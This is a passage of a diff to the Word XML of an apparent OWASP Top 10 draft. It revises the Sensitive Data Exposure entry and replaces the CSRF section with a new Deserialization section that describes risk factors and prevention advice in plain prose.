+          <w:numId w:val="1023"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">OWASP Secure Headers Project - TBA</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1023"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4152,7 +4160,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1021"/>
+          <w:numId w:val="1023"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4169,7 +4177,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1021"/>
+          <w:numId w:val="1023"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4186,8 +4194,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="85" w:name="external-3"/>
-      <w:bookmarkEnd w:id="85"/>
+      <w:bookmarkStart w:id="93" w:name="external-4"/>
+      <w:bookmarkEnd w:id="93"/>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
@@ -4196,7 +4204,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1022"/>
+          <w:numId w:val="1024"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4208,7 +4216,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1022"/>
+          <w:numId w:val="1024"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4220,7 +4228,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1022"/>
+          <w:numId w:val="1024"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4232,10 +4240,10 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="86" w:name="a6-sensitive-information-disclosure"/>
-      <w:bookmarkEnd w:id="86"/>
-      <w:r>
-        <w:t xml:space="preserve">A6 Sensitive Information Disclosure</w:t>
+      <w:bookmarkStart w:id="94" w:name="a6-sensitive-data-exposure"/>
+      <w:bookmarkEnd w:id="94"/>
+      <w:r>
+        <w:t xml:space="preserve">A6 Sensitive Data Exposure</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -4262,7 +4270,7 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Threat agents</w:t>
+              <w:t xml:space="preserve">Threat agents/Attack vectors</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4279,7 +4287,7 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Exploitability</w:t>
+              <w:t xml:space="preserve">Security Weakness</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4296,58 +4304,7 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Prevalance</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcBorders>
-              <w:bottom w:val="single"/>
-            </w:tcBorders>
-            <w:vAlign w:val="bottom"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Detectability</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcBorders>
-              <w:bottom w:val="single"/>
-            </w:tcBorders>
-            <w:vAlign w:val="bottom"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Technical Impact</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcBorders>
-              <w:bottom w:val="single"/>
-            </w:tcBorders>
-            <w:vAlign w:val="bottom"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Business Impacts</w:t>
+              <w:t xml:space="preserve">Impacts</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4360,62 +4317,29 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">App Specific</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">EASY</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">COMMON</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">AVERAGE</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">SEVERE</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">App Specific</w:t>
+              <w:t xml:space="preserve">Access Lvl \</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Exploitability</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Prevalance \</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4428,51 +4352,29 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
+              <w:t xml:space="preserve">Even anonymous attackers typically don’t break crypto directly. They break something else, such as steal keys, do man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s client, e.g. browser.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">The most common flaw is simply not encrypting sensitive data. When crypto is employed, weak key generation and management, and weak algorithm usage is common, particularly weak password hashing techniques. For data in transit server side weaknesses are mainly easy to detect, but hard for data in rest. Both with very varying exploitability. User agent (e.g. browser) weaknesses are easy to detect, but hard to exploit on a large scale.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Failure frequently compromises all data that should have been protected. Typically, this information includes sensitive data such as health records, credentials, personal data, credit cards, etc. The business impact depends on the protection needs of your application and data.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4482,8 +4384,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="87" w:name="am-i-vulnerable-to-attack-5"/>
-      <w:bookmarkEnd w:id="87"/>
+      <w:bookmarkStart w:id="95" w:name="am-i-vulnerable-to-attack-5"/>
+      <w:bookmarkEnd w:id="95"/>
       <w:r>
         <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
       </w:r>
@@ -4493,14 +4395,14 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The first thing you have to determine is which data is sensitive enough to require extra protection. For example, passwords, credit card numbers, health records, and personal information should be protected. For all such data:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1023"/>
+        <w:t xml:space="preserve">The first thing you have to determine are the protection needs of all application data in transit and in rest. For example, passwords, credit card numbers, health records, and personal information require extra protection. For all such data:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1025"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4512,7 +4414,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1023"/>
+          <w:numId w:val="1025"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4524,7 +4426,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1023"/>
+          <w:numId w:val="1025"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4536,24 +4438,36 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1023"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Are weak crypto keys generated, or is proper key management or rotation missing?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1023"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Is encryption not enforced, e.g. are any (browser) security directives or headers missing?</w:t>
+          <w:numId w:val="1025"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Are default crypto keys in use, weak crypto keys generated, or is proper key management or rotation missing?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1025"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Is encryption not enforced, e.g. are any user agent (browser) security directives or headers missing?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1025"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Does the user agent (e.g. app, mail client) not verify if the received certificate is valid.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4568,8 +4482,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="88" w:name="how-do-i-prevent-5"/>
-      <w:bookmarkEnd w:id="88"/>
+      <w:bookmarkStart w:id="96" w:name="how-do-i-prevent-5"/>
+      <w:bookmarkEnd w:id="96"/>
       <w:r>
         <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
@@ -4586,7 +4500,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1024"/>
+          <w:numId w:val="1026"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4598,7 +4512,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1024"/>
+          <w:numId w:val="1026"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4610,7 +4524,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1024"/>
+          <w:numId w:val="1026"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4622,19 +4536,19 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1024"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Ensure strong standard algorithms or ciphers, parameters, protocols and keys are used, and proper key management is in place. Consider using FIPS 140 validated cryptographic modules.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1024"/>
+          <w:numId w:val="1026"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ensure up-to-date and strong standard algorithms or ciphers, parameters, protocols and keys are used, and proper key management is in place. Consider using FIPS 140 validated cryptographic modules.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1026"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4646,7 +4560,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1024"/>
+          <w:numId w:val="1026"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4658,7 +4572,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1024"/>
+          <w:numId w:val="1026"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4670,8 +4584,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="89" w:name="example-scenarios-5"/>
-      <w:bookmarkEnd w:id="89"/>
+      <w:bookmarkStart w:id="97" w:name="example-scenarios-5"/>
+      <w:bookmarkEnd w:id="97"/>
       <w:r>
         <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
@@ -4689,7 +4603,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Scenario #2: A site simply doesn’t use or enforce TLS for all pages. An attacker simply monitors network traffic or strips the TLS (like an open wireless network), and steals the user’s session cookie. The attacker then replays this cookie and hijacks the user’s (authenticated) session, accessing the user’s private data.</w:t>
+        <w:t xml:space="preserve">Scenario #2: A site simply doesn’t use or enforce TLS for all pages, or if it supports weak encryption. An attacker simply monitors network traffic, strips or intercepts the TLS (like an open wireless network), and steals the user’s session cookie. The attacker then replays this cookie and hijacks the user’s (authenticated) session, accessing or modifying the user’s private data. Instead of the above he could also alter all transported data, e.g. the recipient of a money transfer.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4704,8 +4618,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="90" w:name="references-5"/>
-      <w:bookmarkEnd w:id="90"/>
+      <w:bookmarkStart w:id="98" w:name="references-5"/>
+      <w:bookmarkEnd w:id="98"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -4714,8 +4628,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="91" w:name="owasp-4"/>
-      <w:bookmarkEnd w:id="91"/>
+      <w:bookmarkStart w:id="99" w:name="owasp-5"/>
+      <w:bookmarkEnd w:id="99"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -4724,7 +4638,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1025"/>
+          <w:numId w:val="1027"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4741,7 +4655,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1025"/>
+          <w:numId w:val="1027"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4758,7 +4672,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1025"/>
+          <w:numId w:val="1027"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4775,7 +4689,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1025"/>
+          <w:numId w:val="1027"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4792,8 +4706,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="92" w:name="external-4"/>
-      <w:bookmarkEnd w:id="92"/>
+      <w:bookmarkStart w:id="100" w:name="external-5"/>
+      <w:bookmarkEnd w:id="100"/>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
@@ -4802,7 +4716,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1026"/>
+          <w:numId w:val="1028"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4814,7 +4728,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1026"/>
+          <w:numId w:val="1028"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4826,7 +4740,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1026"/>
+          <w:numId w:val="1028"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4838,7 +4752,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1026"/>
+          <w:numId w:val="1028"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4850,10 +4764,10 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="93" w:name="a8-cross-site-request-forgery"/>
-      <w:bookmarkEnd w:id="93"/>
-      <w:r>
-        <w:t xml:space="preserve">A8 Cross site request forgery</w:t>
+      <w:bookmarkStart w:id="101" w:name="a7-deserialization"/>
+      <w:bookmarkEnd w:id="101"/>
+      <w:r>
+        <w:t xml:space="preserve">A7 Deserialization</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -4989,40 +4903,40 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">EASY</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">COMMON</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">AVERAGE</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">SEVERE</w:t>
+              <w:t xml:space="preserve">2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5034,63 +4948,6 @@
             </w:pPr>
             <w:r>
               <w:t xml:space="preserve">App Specific</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5098,12 +4955,20 @@
     </w:tbl>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Exploitation of deserialization is somewhat difficult, as although there are off the shelf exploits, these rarely work without changes or tweaks to the underlying exploit code. There is little data on the prevalence of this issue, and so this issue has been selected by the community. The impact of this issue is severe, with remote code execution on the server where the object is de-serialized.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="94" w:name="am-i-vulnerable-to-csrf"/>
-      <w:bookmarkEnd w:id="94"/>
-      <w:r>
-        <w:t xml:space="preserve">Am I vulnerable to CSRF</w:t>
+      <w:bookmarkStart w:id="102" w:name="am-i-vulnerable-to-attack-6"/>
+      <w:bookmarkEnd w:id="102"/>
+      <w:r>
+        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5111,7 +4976,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">To check whether an application is vulnerable, see if any links and forms lack an unpredictable CSRF token. Without such a token, attackers can forge malicious requests. An alternate defense is to require the user to prove they intended to submit the request, such as through reauthentication.</w:t>
+        <w:t xml:space="preserve">Application architecture has changed dramatically over the last few years, with the move to "server-less" API driven mobile and single page applications, with the associated rise of functional programming frameworks and languages. This seismic shift in application architecture were accompanied by the idea of the client maintaining state, to allow theoretical simpler and more scalable functional code. However, the hallmark of application security is the location of trusted state. Security state cannot be sent to the client without some form of integrity promise.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5119,193 +4984,225 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets. Multistep transactions are not inherently immune. Also be aware that Server-Side Request Forgery (SSRF) is also possible by tricking apps and APIs into generating arbitrary HTTP requests.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Note that session cookies, source IP addresses, and other information automatically sent by the browser don’t defend against CSRF since they are included in the forged requests.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">OWASP’s CSRF Tester tool can help generate test cases to demonstrate the dangers of CSRF flaws.</w:t>
+        <w:t xml:space="preserve">Applications and APIs will be vulnerable if the code:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1029"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The client can create, replay, tamper, or chain existing serialized state (gadgets), AND</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1029"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The server or API deserializes hostile objects supplied by an attacker, AND</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1029"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The objects contain a constructor, destructor, callbacks, auto-instantiation (such as rehydration calls) OR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1029"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The objects override protected or private member fields that contain sensitive state, such as role or similar</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="95" w:name="how-do-i-prevent-6"/>
-      <w:bookmarkEnd w:id="95"/>
+      <w:bookmarkStart w:id="103" w:name="how-do-i-prevent-6"/>
+      <w:bookmarkEnd w:id="103"/>
       <w:r>
         <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1030"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The only safe architectural pattern is to not send or accept serialized objects from untrusted sources</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The preferred option is to use an existing CSRF defense. Many frameworks now include built in CSRF defenses, such as Spring, Play, Django, and AngularJS. Some web development languages, such as .NET do so as well. OWASP’s CSRF Guard can automatically add CSRF defenses to Java apps. OWASP’s CSRFProtector does the same for PHP or as an Apache filter.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Otherwise, preventing CSRF usually requires the inclusion of an unpredictable token in each HTTP request. Such tokens should, at a minimum, be unique per user session.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The preferred option is to include the unique token in a hidden field. This includes the value in the body of the HTTP request, avoiding its exposure in the URL.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The unique token can also be included in the URL or a parameter. However, this runs the risk that the token will be exposed to an attacker.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
